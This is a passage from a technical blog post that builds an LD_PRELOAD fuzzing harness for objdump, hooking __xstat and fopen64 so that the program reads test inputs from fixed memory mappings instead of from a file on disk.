        <span class="n">st</span><span class="p">.</span><span class="n">st_size</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="kt">size_t</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_SZ_ADDR</span><span class="p">;</span>

        <span class="c1">// Send it back to the caller, skip syscall</span>
        <span class="n">memcpy</span><span class="p">(</span><span class="n">__stat_buf</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">st</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">stat</span><span class="p">));</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Just a normal stat, send to real xstat</span>
    <span class="k">else</span> <span class="p">{</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="n">real_xstat</span><span class="p">(</span><span class="n">__ver</span><span class="p">,</span> <span class="n">__filename</span><span class="p">,</span> <span class="n">__stat_buf</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Map memory to hold our inputs in memory and information about their size</span>
<span class="k">static</span> <span class="kt">void</span> <span class="nf">_create_mem_mappings</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">void</span> <span class="o">*</span><span class="n">result</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

    <span class="c1">// Map the page to hold the input size</span>
    <span class="n">result</span> <span class="o">=</span> <span class="n">mmap</span><span class="p">(</span>
        <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)(</span><span class="n">INPUT_SZ_ADDR</span><span class="p">),</span>
        <span class="k">sizeof</span><span class="p">(</span><span class="kt">size_t</span><span class="p">),</span>
        <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span>
        <span class="n">MAP_PRIVATE</span> <span class="o">|</span> <span class="n">MAP_ANONYMOUS</span> <span class="o">|</span> <span class="n">MAP_FIXED</span><span class="p">,</span>
        <span class="mi">0</span><span class="p">,</span>
        <span class="mi">0</span>
    <span class="p">);</span>
    <span class="k">if</span> <span class="p">((</span><span class="n">MAP_FAILED</span> <span class="o">==</span> <span class="n">result</span><span class="p">)</span> <span class="o">||</span> <span class="p">(</span><span class="n">result</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_SZ_ADDR</span><span class="p">))</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Err mapping INPUT_SZ_ADDR, mapped @ %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">result</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Let's actually initialize the value at the input size location as well</span>
    <span class="o">*</span><span class="p">(</span><span class="kt">size_t</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_SZ_ADDR</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

    <span class="c1">// Map the pages to hold the input contents</span>
    <span class="n">result</span> <span class="o">=</span> <span class="n">mmap</span><span class="p">(</span>
        <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)(</span><span class="n">INPUT_ADDR</span><span class="p">),</span>
        <span class="p">(</span><span class="kt">size_t</span><span class="p">)(</span><span class="n">MAX_INPUT_SZ</span><span class="p">),</span>
        <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span>
        <span class="n">MAP_PRIVATE</span> <span class="o">|</span> <span class="n">MAP_ANONYMOUS</span> <span class="o">|</span> <span class="n">MAP_FIXED</span><span class="p">,</span>
        <span class="mi">0</span><span class="p">,</span>
        <span class="mi">0</span>
    <span class="p">);</span>
    <span class="k">if</span> <span class="p">((</span><span class="n">MAP_FAILED</span> <span class="o">==</span> <span class="n">result</span><span class="p">)</span> <span class="o">||</span> <span class="p">(</span><span class="n">result</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_ADDR</span><span class="p">))</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Err mapping INPUT_ADDR, mapped @ %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">result</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Init the value</span>
    <span class="n">memset</span><span class="p">((</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_ADDR</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)</span><span class="n">MAX_INPUT_SZ</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Routine to be called when our shared object is loaded</span>
<span class="n">__attribute__</span><span class="p">((</span><span class="n">constructor</span><span class="p">))</span> <span class="k">static</span> <span class="kt">void</span> <span class="nf">_hook_load</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Create memory mappings to hold our input and information about its size</span>
    <span class="n">_create_mem_mappings</span><span class="p">();</span>    
<span class="p">}</span>
</code></pre></div></div>

<p>Now if we run this, we get the following output:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme
objdump: Warning: 'fuzzme' is not an ordinary file
</code></pre></div></div>

<p>This is cool, this means that the objdump devs did something right and their <code class="language-plaintext highlighter-rouge">stat()</code> would say: “Hey, this file is zero bytes in length, something weird is going on” and they spit out this error message and exit. Good job devs!</p>

<p>So we have identified a problem, we need to <strong>simulate</strong> the fuzzer placing a real input into memory, to do that, I’m going to start using <code class="language-plaintext highlighter-rouge">#ifdef</code> to define whether or not we’re testing our shared object. So basically, if we compile the shared object and define <code class="language-plaintext highlighter-rouge">TEST</code>, our shared object will copy an “input” into memory to simulate how the fuzzer would behave during fuzzing and we can see if our harness is working appropriately. So if we define <code class="language-plaintext highlighter-rouge">TEST</code>, we will copy <code class="language-plaintext highlighter-rouge">/bin/ed</code> into memory, and we will update our global “legit” <code class="language-plaintext highlighter-rouge">stat struct</code> size member, and place the <code class="language-plaintext highlighter-rouge">/bin/ed</code> bytes into memory.</p>

<p>You can compile the shared object now to perform the test as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gcc -D TEST -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ld
</code></pre></div></div>

<p>We also need to set up our global “legit” <code class="language-plaintext highlighter-rouge">stat struct</code>, the code to do that should look as follows. Remember, we pass a fake <code class="language-plaintext highlighter-rouge">__ver</code> variable to let the <code class="language-plaintext highlighter-rouge">__xstat()</code> hook know that it’s us in the <code class="language-plaintext highlighter-rouge">constructor</code> routine, which allows the hook to behave well and give us the <code class="language-plaintext highlighter-rouge">stat struct</code> we need:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Create a "legit" stat struct globally to pass to callers</span>
<span class="k">static</span> <span class="kt">void</span> <span class="nf">_setup_stat_struct</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Create a global stat struct for our file in case someone asks, this way</span>
    <span class="c1">// when someone calls stat() or fstat() on our target, we can just return the</span>
    <span class="c1">// slightly altered (new size) stat struct &amp;skip the kernel, save syscalls</span>
    <span class="kt">int</span> <span class="n">result</span> <span class="o">=</span> <span class="n">__xstat</span><span class="p">(</span><span class="mh">0x1337</span><span class="p">,</span> <span class="n">FUZZ_TARGET</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">st</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">-</span><span class="mi">1</span> <span class="o">==</span> <span class="n">result</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Error creating stat struct for '%s' during load</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">FUZZ_TARGET</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>All in all, our entire harness looks like this now:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* 
Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
*/</span>

<span class="cp">#define _GNU_SOURCE     </span><span class="cm">/* dlsym */</span><span class="cp">
#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="c1"> /* printf */</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/stat.h&gt;</span><span class="c1"> /* stat */</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="c1"> /* exit */</span><span class="cp">
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="c1"> /* __xstat, __fxstat */</span><span class="cp">
#include</span> <span class="cpf">&lt;dlfcn.h&gt;</span><span class="c1"> /* dlsym and friends */</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/mman.h&gt;</span><span class="c1"> /* mmap */</span><span class="cp">
#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="c1"> /* memset */</span><span class="cp">
#include</span> <span class="cpf">&lt;fcntl.h&gt;</span><span class="c1"> /* open */</span><span class="cp">
</span>
<span class="c1">// Filename of the input file we're trying to emulate</span>
<span class="cp">#define FUZZ_TARGET     "fuzzme"
</span>
<span class="c1">// Definitions for our in-memory inputs </span>
<span class="cp">#define INPUT_SZ_ADDR   0x1336000
#define INPUT_ADDR      0x1337000
#define MAX_INPUT_SZ    (1024 * 1024)
</span>
<span class="c1">// For testing purposes, we read /bin/ed into our input buffer to simulate</span>
<span class="c1">// what the fuzzer would do</span>
<span class="cp">#define  TEST_FILE      "/bin/ed"
</span>
<span class="c1">// Our "legit" global stat struct</span>
<span class="k">struct</span> <span class="n">stat</span> <span class="n">st</span><span class="p">;</span>

<span class="c1">// Declare a prototype for the real stat as a function pointer</span>
<span class="k">typedef</span> <span class="nf">int</span> <span class="p">(</span><span class="o">*</span><span class="n">__xstat_t</span><span class="p">)(</span><span class="kt">int</span> <span class="n">__ver</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">__filename</span><span class="p">,</span> <span class="k">struct</span> <span class="n">stat</span> <span class="o">*</span><span class="n">__stat_buf</span><span class="p">);</span>
<span class="n">__xstat_t</span> <span class="n">real_xstat</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="c1">// Returns memory address of *next* location of symbol in library search order</span>
<span class="k">static</span> <span class="kt">void</span> <span class="o">*</span><span class="nf">_resolve_symbol</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">symbol</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Clear previous errors</span>
    <span class="n">dlerror</span><span class="p">();</span>

    <span class="c1">// Get symbol address</span>
    <span class="kt">void</span><span class="o">*</span> <span class="n">addr</span> <span class="o">=</span> <span class="n">dlsym</span><span class="p">(</span><span class="n">RTLD_NEXT</span><span class="p">,</span> <span class="n">symbol</span><span class="p">);</span>

    <span class="c1">// Check for error</span>
    <span class="kt">char</span><span class="o">*</span> <span class="n">err</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
    <span class="n">err</span> <span class="o">=</span> <span class="n">dlerror</span><span class="p">();</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">err</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">addr</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Err resolving '%s' addr: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">symbol</span><span class="p">,</span> <span class="n">err</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>
    
    <span class="k">return</span> <span class="n">addr</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Hook for __xstat </span>
<span class="kt">int</span> <span class="nf">__xstat</span><span class="p">(</span><span class="kt">int</span> <span class="n">__ver</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">__filename</span><span class="p">,</span> <span class="k">struct</span> <span class="n">stat</span><span class="o">*</span> <span class="n">__stat_buf</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Resolve the real __xstat() on demand and maybe multiple times!</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">real_xstat</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">real_xstat</span> <span class="o">=</span> <span class="n">_resolve_symbol</span><span class="p">(</span><span class="s">"__xstat"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Assume the worst, always</span>
    <span class="kt">int</span> <span class="n">ret</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>

    <span class="c1">// Special __ver value check to see if we're calling from constructor</span>
    <span class="k">if</span> <span class="p">(</span><span class="mh">0x1337</span> <span class="o">==</span> <span class="n">__ver</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// Patch back up the version value before sending to real xstat</span>
        <span class="n">__ver</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>

        <span class="n">ret</span> <span class="o">=</span> <span class="n">real_xstat</span><span class="p">(</span><span class="n">__ver</span><span class="p">,</span> <span class="n">__filename</span><span class="p">,</span> <span class="n">__stat_buf</span><span class="p">);</span>

        <span class="c1">// Set the real_xstat back to NULL</span>
        <span class="n">real_xstat</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
        <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Determine if we're stat'ing our fuzzing target</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">strcmp</span><span class="p">(</span><span class="n">__filename</span><span class="p">,</span> <span class="n">FUZZ_TARGET</span><span class="p">))</span> <span class="p">{</span>
        <span class="c1">// Update our global stat struct</span>
        <span class="n">st</span><span class="p">.</span><span class="n">st_size</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="kt">size_t</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_SZ_ADDR</span><span class="p">;</span>

        <span class="c1">// Send it back to the caller, skip syscall</span>
        <span class="n">memcpy</span><span class="p">(</span><span class="n">__stat_buf</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">st</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">stat</span><span class="p">));</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Just a normal stat, send to real xstat</span>
    <span class="k">else</span> <span class="p">{</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="n">real_xstat</span><span class="p">(</span><span class="n">__ver</span><span class="p">,</span> <span class="n">__filename</span><span class="p">,</span> <span class="n">__stat_buf</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Map memory to hold our inputs in memory and information about their size</span>
<span class="k">static</span> <span class="kt">void</span> <span class="nf">_create_mem_mappings</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">void</span> <span class="o">*</span><span class="n">result</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

    <span class="c1">// Map the page to hold the input size</span>
    <span class="n">result</span> <span class="o">=</span> <span class="n">mmap</span><span class="p">(</span>
        <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)(</span><span class="n">INPUT_SZ_ADDR</span><span class="p">),</span>
        <span class="k">sizeof</span><span class="p">(</span><span class="kt">size_t</span><span class="p">),</span>
        <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span>
        <span class="n">MAP_PRIVATE</span> <span class="o">|</span> <span class="n">MAP_ANONYMOUS</span> <span class="o">|</span> <span class="n">MAP_FIXED</span><span class="p">,</span>
        <span class="mi">0</span><span class="p">,</span>
        <span class="mi">0</span>
    <span class="p">);</span>
    <span class="k">if</span> <span class="p">((</span><span class="n">MAP_FAILED</span> <span class="o">==</span> <span class="n">result</span><span class="p">)</span> <span class="o">||</span> <span class="p">(</span><span class="n">result</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_SZ_ADDR</span><span class="p">))</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Err mapping INPUT_SZ_ADDR, mapped @ %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">result</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Let's actually initialize the value at the input size location as well</span>
    <span class="o">*</span><span class="p">(</span><span class="kt">size_t</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_SZ_ADDR</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

    <span class="c1">// Map the pages to hold the input contents</span>
    <span class="n">result</span> <span class="o">=</span> <span class="n">mmap</span><span class="p">(</span>
        <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)(</span><span class="n">INPUT_ADDR</span><span class="p">),</span>
        <span class="p">(</span><span class="kt">size_t</span><span class="p">)(</span><span class="n">MAX_INPUT_SZ</span><span class="p">),</span>
        <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span>
        <span class="n">MAP_PRIVATE</span> <span class="o">|</span> <span class="n">MAP_ANONYMOUS</span> <span class="o">|</span> <span class="n">MAP_FIXED</span><span class="p">,</span>
        <span class="mi">0</span><span class="p">,</span>
        <span class="mi">0</span>
    <span class="p">);</span>
    <span class="k">if</span> <span class="p">((</span><span class="n">MAP_FAILED</span> <span class="o">==</span> <span class="n">result</span><span class="p">)</span> <span class="o">||</span> <span class="p">(</span><span class="n">result</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_ADDR</span><span class="p">))</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Err mapping INPUT_ADDR, mapped @ %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">result</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Init the value</span>
    <span class="n">memset</span><span class="p">((</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_ADDR</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)</span><span class="n">MAX_INPUT_SZ</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Create a "legit" stat struct globally to pass to callers</span>
<span class="k">static</span> <span class="kt">void</span> <span class="nf">_setup_stat_struct</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">int</span> <span class="n">result</span> <span class="o">=</span> <span class="n">__xstat</span><span class="p">(</span><span class="mh">0x1337</span><span class="p">,</span> <span class="n">FUZZ_TARGET</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">st</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">-</span><span class="mi">1</span> <span class="o">==</span> <span class="n">result</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Error creating stat struct for '%s' during load</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">FUZZ_TARGET</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c1">// Used for testing, load /bin/ed into the input buffer and update its size info</span>
<span class="cp">#ifdef TEST
</span><span class="k">static</span> <span class="kt">void</span> <span class="nf">_test_func</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>    
    <span class="c1">// Open TEST_FILE for reading</span>
    <span class="kt">int</span> <span class="n">fd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="n">TEST_FILE</span><span class="p">,</span> <span class="n">O_RDONLY</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">-</span><span class="mi">1</span> <span class="o">==</span> <span class="n">fd</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Failed to open '%s' during test</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">TEST_FILE</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Attempt to read max input buf size</span>
    <span class="kt">ssize_t</span> <span class="n">bytes</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">INPUT_ADDR</span><span class="p">,</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)</span><span class="n">MAX_INPUT_SZ</span><span class="p">);</span>
    <span class="n">close</span><span class="p">(</span><span class="n">fd</span><span class="p">);</span>

    <span class="c1">// Update the input size</span>
    <span class="o">*</span><span class="p">(</span><span class="kt">size_t</span> <span class="o">*</span><span class="p">)</span><span class="n">INPUT_SZ_ADDR</span> <span class="o">=</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)</span><span class="n">bytes</span><span class="p">;</span>
<span class="p">}</span>
<span class="cp">#endif
</span>
<span class="c1">// Routine to be called when our shared object is loaded</span>
<span class="n">__attribute__</span><span class="p">((</span><span class="n">constructor</span><span class="p">))</span> <span class="k">static</span> <span class="kt">void</span> <span class="nf">_hook_load</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Create memory mappings to hold our input and information about its size</span>
    <span class="n">_create_mem_mappings</span><span class="p">();</span>

    <span class="c1">// Setup global "legit" stat struct</span>
    <span class="n">_setup_stat_struct</span><span class="p">();</span>

    <span class="c1">// If we're testing, load /bin/ed up into our input buffer and update size</span>
<span class="cp">#ifdef TEST
</span>    <span class="n">_test_func</span><span class="p">();</span>
<span class="cp">#endif
</span><span class="p">}</span>
</code></pre></div></div>

<p>Now if we run this under <code class="language-plaintext highlighter-rouge">strace</code>, we notice that our two <code class="language-plaintext highlighter-rouge">stat()</code> calls are conspicuously missing.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>close(3)                                = 0
openat(AT_FDCWD, "fuzzme", O_RDONLY)    = 3
fcntl(3, F_GETFD)                       = 0
fcntl(3, F_SETFD, FD_CLOEXEC)           = 0
</code></pre></div></div>

<p>We no longer see the <code class="language-plaintext highlighter-rouge">stat()</code> calls before the <code class="language-plaintext highlighter-rouge">openat()</code> and the program does not break in any significant way. So this hook seems to be working appropriately. We now need to handle the <code class="language-plaintext highlighter-rouge">openat()</code> and make sure we don’t actually interact with our input file, but instead trick objdump to interact with our input in memory.</p>

<h2 id="finding-a-way-to-hook-openat">Finding a Way to Hook <code class="language-plaintext highlighter-rouge">openat()</code></h2>
<p>My non-expert intuition tells me theres probably a few ways in which a libc function could end up calling <code class="language-plaintext highlighter-rouge">openat()</code> under the hood. Those ways might include the wrappers <code class="language-plaintext highlighter-rouge">open()</code> as well as <code class="language-plaintext highlighter-rouge">fopen()</code>. We also need to be mindful of their <code class="language-plaintext highlighter-rouge">64</code> variants as well (<code class="language-plaintext highlighter-rouge">open64()</code>, <code class="language-plaintext highlighter-rouge">fopen64()</code>). I decided to try the <code class="language-plaintext highlighter-rouge">fopen()</code> hooks first:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Declare prototype for the real fopen and its friend fopen64 </span>
<span class="k">typedef</span> <span class="kt">FILE</span><span class="o">*</span> <span class="p">(</span><span class="o">*</span><span class="n">fopen_t</span><span class="p">)(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">pathname</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">mode</span><span class="p">);</span>
<span class="n">fopen_t</span> <span class="n">real_fopen</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="k">typedef</span> <span class="kt">FILE</span><span class="o">*</span> <span class="p">(</span><span class="o">*</span><span class="n">fopen64_t</span><span class="p">)(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">pathname</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">mode</span><span class="p">);</span>
<span class="n">fopen64_t</span> <span class="n">real_fopen64</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="p">...</span>

<span class="c1">// Exploratory hooks to see if we're using fopen() related functions to open</span>
<span class="c1">// our input file</span>
<span class="kt">FILE</span><span class="o">*</span> <span class="nf">fopen</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">pathname</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">mode</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"** fopen() called for '%s'</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">pathname</span><span class="p">);</span>
    <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">FILE</span><span class="o">*</span> <span class="nf">fopen64</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">pathname</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">mode</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"** fopen64() called for '%s'</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">pathname</span><span class="p">);</span>
    <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>If we compile and run our exploratory hooks, we get the following output:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme
** fopen64() called for 'fuzzme'
</code></pre></div></div>

<p>Bingo, dino DNA.</p>

<p>So now we can flesh that hooked function out a bit to behave how we want.</p>

<h2 id="refining-an-fopen64-hook">Refining an <code class="language-plaintext highlighter-rouge">fopen64()</code> Hook</h2>
<p>The definition for <code class="language-plaintext highlighter-rouge">fopen64()</code> is: ` FILE *fopen(const char *restrict pathname, const char *restrict mode);<code class="language-plaintext highlighter-rouge">. The returned </code>FILE *<code class="language-plaintext highlighter-rouge"> poses a slight problem to us because this is an opaque data structure that is not meant to be understood by the caller. Which is to say, the caller is not meant to access any members of this data structure or worry about its layout in any way. You're just supposed to use the returned </code>FILE *<code class="language-plaintext highlighter-rouge"> as an object to pass to other functions, such as </code>fclose()`. The system deals with the data structure there in those types of related functions so that programmers don’t have to worry about a specific implementation.</p>

<p>We don’t actually know how the returned <code class="language-plaintext highlighter-rouge">FILE *</code> will be used, it may not be used at all, or it may be passed to a function such as <code class="language-plaintext highlighter-rouge">fread()</code> so we need a way to return a convincing <code class="language-plaintext highlighter-rouge">FILE *</code> data structure to the caller that is actually built from our input in memory and NOT from the input file. Luckily, there is a libc function called <code class="language-plaintext highlighter-rouge">fmemopen()</code> which behaves very similarly to <code class="language-plaintext highlighter-rouge">fopen()</code> and also returns a <code class="language-plaintext highlighter-rouge">FILE *</code>. So we can go ahead and create a <code class="language-plaintext highlighter-rouge">FILE *</code> to return to callers of <code class="language-plaintext highlighter-rouge">fopen64()</code> with <code class="language-plaintext highlighter-rouge">fuzzme</code> as the target input file. Shoutout to @domenuk for showing me <code class="language-plaintext highlighter-rouge">fmemopen()</code>, I had never come across it before.</p>

<p>There is one key difference though. <code class="language-plaintext highlighter-rouge">fopen()</code> will actually obtain file descriptor for the underlying file and <code class="language-plaintext highlighter-rouge">fmemopen()</code>, since it is not actually openining a file, will not. So somewhere in the <code class="language-plaintext highlighter-rouge">FILE *</code> data structure, there is a file descriptor for the underlying file if returned from <code class="language-plaintext highlighter-rouge">fopen()</code> and there isn’t one if returned from <code class="language-plaintext highlighter-rouge">fmemopen()</code>. This is very important as functions such as <code class="language-plaintext highlighter-rouge">int fileno(FILE *stream)</code> can parse a <code class="language-plaintext highlighter-rouge">FILE *</code> and return its underlying file descriptor to the caller. Objdump may want to do this for some reason and we need to be able to robustly handle it. So we need a way to know if someone is trying to use our faked <code class="language-plaintext highlighter-rouge">FILE *</code> underlying file descriptor.</p>

<p>My idea for this was to simply find the struct member containing the file descriptor in the <code class="language-plaintext highlighter-rouge">FILE *</code> returned from <code class="language-plaintext highlighter-rouge">fmemopen()</code> and change it to be something ridiculous like <code class="language-plaintext highlighter-rouge">1337</code> so that if objdump ever tried to use that file descriptor we would know the source of it and could try to hook any interactions with the file descriptor. So now our <code class="language-plaintext highlighter-rouge">fopen64()</code> hook should look as follows:</p>
